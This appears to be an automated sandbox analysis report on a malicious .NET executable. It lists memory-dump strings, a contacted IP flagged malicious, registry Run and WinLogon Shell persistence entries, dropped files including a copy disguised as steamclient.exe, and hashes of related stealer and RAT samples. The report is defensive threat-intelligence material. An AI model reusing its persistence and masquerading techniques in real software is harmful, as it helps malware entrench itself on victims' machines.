                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.1989099278.0000017D00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2050478249.0000023794EB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2093877533.00000232DF4EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1989482663.0000020B00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2062197023.0000019AA86FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2061175203.000001D29F7B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2033046125.0000029B28865000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1989487871.000002B600347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1996250777.000001D549428000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2054374422.000002E5E4F96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2064130669.0000015044507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2103124929.0000026A8BB78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053252505.000002DB27908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1983650675.0000018780225000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameqNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1989099278.0000017D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2050478249.0000023794C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2093877533.00000232DF1B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1989482663.0000020B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2062197023.0000019AA84B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2061175203.000001D29F591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2033046125.0000029B28641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1989487871.000002B600121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1996250777.000001D549201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2054374422.000002E5E4D7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2064130669.00000150442E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2103124929.0000026A8B962000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053252505.000002DB276E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1983650675.0000018780001000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000036.00000002.2527567041.0000000002A2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001B.00000002.1983650675.0000018780225000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/Pester/Pesterpowershell.exe, 0000001B.00000002.1983650675.0000018780225000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1989099278.0000017D00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2050478249.0000023794EB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2093877533.00000232DF4EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1989482663.0000020B00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2062197023.0000019AA86FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2061175203.000001D29F7B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2033046125.0000029B28865000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1989487871.000002B600347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1996250777.000001D549428000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2054374422.000002E5E4F96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2064130669.0000015044507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2103124929.0000026A8BB78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053252505.000002DB27908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1983650675.0000018780225000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://ipinfo.io/ipqNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.2229710923.000000001B6E2000.00000002.00000001.01000000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.00000000027DA000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000027BA000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000032.00000002.2396208828.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000032.00000002.2396208828.000000000301A000.00000004.00000800.00020000.00000000.sdmp, IsFPfNCu.log.0.dr, GeNRoyLy.log.63.dr, ITtzBsaM.log.58.dr, BwVbAMfc.log.54.dr, PXvpYVwJ.log.50.dr, VHHMJZBT.log.36.drfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        172.66.0.102
                                        		390412cm.n9shteam.inUnited States
                                        		13335CLOUDFLARENETUStrue

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1565523
                                        Start date and time:2024-11-30 04:26:06 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 10m 55s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:63
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Sample name:qNdO4D18CF.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:CE2EC4539435DFEAC7E246FE5565C521.exe
                                        Detection:MAL
                                        Classification:mal100.spre.troj.expl.evad.winEXE@78/211@1/1
                                        EGA Information:Failed
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target qNdO4D18CF.exe, PID 2088 because it is empty
                                        • Execution Graph export aborted for target qNdO4D18CF.exe, PID 7436 because it is empty
                                        • Execution Graph export aborted for target steamclient.exe, PID 5900 because it is empty
                                        • Execution Graph export aborted for target steamclient.exe, PID 6624 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        03:27:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run steamclient "C:\Program Files (x86)\Steam\steamclient.exe"
                                        03:27:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qNdO4D18CF "C:\Users\user\Desktop\qNdO4D18CF.exe"
                                        03:27:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run steamclient "C:\Program Files (x86)\Steam\steamclient.exe"
                                        03:27:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qNdO4D18CF "C:\Users\user\Desktop\qNdO4D18CF.exe"
                                        03:27:40AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run steamclient "C:\Program Files (x86)\Steam\steamclient.exe"
                                        03:27:48AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run qNdO4D18CF "C:\Users\user\Desktop\qNdO4D18CF.exe"
                                        03:28:05AutostartRun: WinLogon Shell "C:\Program Files (x86)\Steam\steamclient.exe"
                                        03:28:14AutostartRun: WinLogon Shell "C:\Users\user\Desktop\qNdO4D18CF.exe"
                                        22:27:05API Interceptor325x Sleep call for process: powershell.exe modified
                                        22:28:02API Interceptor1x Sleep call for process: steamclient.exe modified
                                        22:28:27API Interceptor1x Sleep call for process: qNdO4D18CF.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        172.66.0.102Technical Details & Profile Illustrations for This#U00a0Drygair.htmlGet hashmaliciousCorporateDataTheft, HTMLPhisherBrowse
                                          View_alert_details IJPI.htmlGet hashmaliciousUnknownBrowse
                                            Status Update DXLG.htmlGet hashmaliciousUnknownBrowse

                                              Domains

                                              No context

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.16.9
                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                              • 104.21.16.9
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.165.166
                                              saloader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                              • 162.159.129.233
                                              ONHQNHFT.msiGet hashmaliciousUnknownBrowse
                                              • 172.67.141.133
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.165.166
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.165.166
                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                              • 104.21.75.163
                                              file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                              • 104.16.123.96
                                              https://thunderstore.io/package/download/Grad/HiddenUnits/1.3.0/Get hashmaliciousUnknownBrowse
                                              • 104.26.14.210

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\Desktop\AFZZLiTQ.logiN1fhAtzW2.exeGet hashmaliciousDCRatBrowse
                                                based.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                  4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    rvNK8fDa0k.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      RustChecker.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                        KPFv8ATDx0.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          LzmJLVB41K.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              T0jSGXdxX5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                s5duotgoYD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                  Created / dropped Files

                                                                  C:\Program Files (x86)\Steam\fcafd258929766

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:ASCII text, with very long lines (989), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):989
                                                                  Entropy (8bit):5.916028448735198
                                                                  Encrypted:false
                                                                  SSDEEP:24:v9YQH/MVgiW9BbToRRJRLsATdTdhrxtSOJn:vliW7oxLRdhrJJn
                                                                  MD5:FB0FFC1C479C8C0DB4B4E385A096E55B
                                                                  SHA1:DE9692E261976ECA334CF3712C52AD0E7E8C2707
                                                                  SHA-256:42B67B42B945AD18C4C7B30E123DA8E94C4DBB3F67E5A6C67602DFB633096A8F
                                                                  SHA-512:DF5E4101649F593377C79905FF065131EB614E9704219B7EA87A634FF60AD14D048051F26CFA5B95B25E85D4F412E0B9AEF8047DE5994375165011F8FA57667C
                                                                  Malicious:false
                                                                  Preview:FEvg7YIk9y8s0K5SfVdPv7vsQ0C5fC9sP3hWDiZ3cAv7z90r10pxTOOHSDQGVNE7zQc7njP66kwuMy2R9VEoWLYBpaEASShP6xHjh3DSls1tbd4dK9GAJZkn1bSNfPnnChyZqSuGRwDnTojLfkzTLgGgNdrFk0xWFNq4ofx2PAtWW6UN1Gr4ZTcgaSLMkofb8qiG7ohAx7ELxtJQJeNeI26vvKdWTkRkeSYpXNPNjrHcPQsrI5CFaBSGuxUwLKqMperfVe25PA4audfecwOYiLKc9R5k3cBZB5xvjMVnCG0ZH2VQRzUY6SoeTOgEjSCw8fZzqu5PakVbVuVG5oSDIncsRSbUqREuEDbmdgkg4E7W7MJj3ZI4A9oVCqiXTkjJfkXRStnZEvJDpGvEJ1bQJJuFZGjw8MNTfy0Wz1QJws0Ozlp55dNcIS9V0S2MJ1b1izi0QYORkReaTfPyan0e8uLMzefh9EA4R8pACzpgP510xjBUCDwgA63xnVBv3qSgRjIV0Ovk7UOC2UYPcLe5Rd4VF1Wrx4ninViOaqeySLipr05T6vSrLWOypxQ81DwCrqYgvKywqqnG4OnO6DuCm5XRHuinag6PYg8BbYhw7fAftI3aJBByTuZvTGZAlLVKtXrYPlwif8FG51i91HdZeI5oGNsU9gKvKzvVaeKiOdSVpSzbiaJer6qlcDSC3bi8xT6FGNiX65KAzk8xXRwjXqEOJJ2XLIpw4UhWWuUU1whvvpw1Efolp9lHOs56UKLyQYGeDmbm6crlJSceXBTqdDH4saHnyY9rksfXjRycEBpNSA86PbjT1eUNQLwmexyic9AawF4FM0mcX4msbLYWyq0GYSGYfL7RNHuTAiJKhdGA22zWjDLTZbtwJ4Be8gkA2VOQJSs3BNzUjzNgduzbAo2wY8KGgpLA3FHhnjNQVRSLlYMTqfAOrIAOdc2KImXVBybdrq24giGsWqK9v0ZAo7TvF3DKq

                                                                  C:\Program Files (x86)\Steam\steamclient.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                  Category:dropped
                                                                  Size (bytes):3012834
                                                                  Entropy (8bit):7.992098117519039
                                                                  Encrypted:true
                                                                  SSDEEP:49152:6h/814lignPl1s5Cp5+tOCiqgc8I7uBiYUtGGirMn0JkH4SwiLwRktMtL+CsA7Z:6h/8Hgn9u4P+l8I7uB6db0JhAw6tMtLr
                                                                  MD5:CE2EC4539435DFEAC7E246FE5565C521
                                                                  SHA1:59F3DA006005A109914C31B5D5CD94DC4C93309C
                                                                  SHA-256:D5EE74F4F460C4F861C01ECC3E22B679075949108B6FEE594193695D4175D562
                                                                  SHA-512:408A1DB2CD98702BCA3811E124D78A56CBCA79A1D200593759BDE1947A4A599F8CD40CD8DBB2E7BE7DEC416E3F5DE0C4466F98DDEA1DAF6D313671695F25A7BA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                                  Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                  C:\Program Files (x86)\Steam\steamclient.exe:Zone.Identifier

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\qNdO4D18CF.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2126
                                                                  Entropy (8bit):5.371983462188659
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVH1HzHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKkt1VTqZ4T
                                                                  MD5:D33BA8C668FD72474467B52419A11D81
                                                                  SHA1:A82B84518B103852986F9D438499B334A2BD9BE7
                                                                  SHA-256:055A3D0023EE2367127802D41DEF0A58C3184DCCBC73F84C11FA17796A5C487A
                                                                  SHA-512:96D12D066F538F7A8978E8A4FC4C2674473393C2DAFBBBFBE6D26514FD455F0281613FA0EE4316A921631FDC7E36C25A6F12075A7A4A400DB68C5A38CFAF1290
                                                                  Malicious:true
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\steamclient.exe.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1667
                                                                  Entropy (8bit):5.372078619649986
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVH1Hi:iq+wmj0qCYqGSI6oPtzHeqKkt1VC
                                                                  MD5:C70BB143F33184A9EB18128882038C9E
                                                                  SHA1:6C59C249DFB1D0B5ACED36CB718896CDEC505B9D
                                                                  SHA-256:8B3EBBAB4A6C11BAE0E8D3B84046BD9E1E0B36D593086F61C542A0C921D8E9B4
                                                                  SHA-512:838D059E24F515599F39DAE6CEECDBBFD1BD46385ED86A3514A14F9A6525268991DAE09400A1A1557A38EF1A931B881C95EEE5BDD685D7F67303AAA7461E925A
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):19253
                                                                  Entropy (8bit):5.005753878328145
                                                                  Encrypted:false
                                                                  SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                  MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                  SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                  SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                  SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                  Malicious:false
                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1940658735648508
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllultnxj:NllU
                                                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                  Malicious:false
                                                                  Preview:@...e................................................@..........

                                                                  C:\Users\user\AppData\Local\Temp\Hs46Jw7tmA

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.133660689688186
                                                                  Encrypted:false
                                                                  SSDEEP:3:Js2vQaH:RvH
                                                                  MD5:54FCB314C05F843D19D87778B80660B4
                                                                  SHA1:74DBB06C7CBB825D80B13F36DF1EC38076EADD54
                                                                  SHA-256:ACC38849229FBC45E5502982E53642C4B352137C44D35138F71606C623D025A3
                                                                  SHA-512:FC80517A4FFC328FF38B157C68C1D3CCD06E3E0F10A167D7400382298E1C4468E7E6FBDBE832E579882A186272BC47B8997D94C92EF9DCF0D23EE807EF7FAFB1
                                                                  Malicious:false
                                                                  Preview:mGrIBR2wR2YSMWrEfqYymrNeb

                                                                  C:\Users\user\AppData\Local\Temp\RESA90.tmp

                                                                  Download File
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Sat Nov 30 04:28:38 2024, 1st section name ".debug$S"
                                                                  Category:dropped
                                                                  Size (bytes):1948
                                                                  Entropy (8bit):4.556861796322988
                                                                  Encrypted:false
                                                                  SSDEEP:24:HqG9EnOOzMJfHZwKEsmN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:kzMxiKhmyluOulajfqXSfbNtmhY2Z
                                                                  MD5:48A21A485562FACCCC9D7F9797F3C66D
                                                                  SHA1:DAD7B5461FD66F36AD688D0D92AD36B0096D4FDF
                                                                  SHA-256:BE4026D7C2368DD6D4BE3E8FEAA844FE7885FC02ECC612CBD3409033A60B4FB7
                                                                  SHA-512:D527F7199968247CB75D612C3292BC2D7E5DDFD36C97A48EE55405D4E126F6BC4BA64E032D8CCEE0CACC57E823C4A3E54B74F069EEA45ADE883FB977B3B44927
                                                                  Malicious:false
                                                                  Preview:L...v.Jg.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........;....c:\Windows\System32\CSCA9DA535D810450AA35B2C9F27DA16D.TMP...................r.av..t.y..............3.......C:\Users\user\AppData\Local\Temp\RESA90.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.

                                                                  C:\Users\user\AppData\Local\Temp\XyagYCCOZX.bat

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.1840976336164015
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mbZj4I52ReIvvSBktKcKZG1t+kiE2J5xAIDEpEh:hCRLuVFOOr+DER52TSKOZG1wkn23fYpK
                                                                  MD5:D87118B87824039F648E7DF5E940DF41
                                                                  SHA1:CC6B34EEA8D2177C619A0436684324BDE463B275
                                                                  SHA-256:720A6474CE6CC899D2EA70298C23A73C8ABFF9DE47BAB4E8361F6F24B16FB426
                                                                  SHA-512:47E1BB013FDCDFC073B1593017420DF30AB29E67972A393F8A734EAB04B04F4681FC82958C255C6179601D5911A6677FD3F116E7B733F88B81763A0F53206147
                                                                  Malicious:true
                                                                  Antivirus:
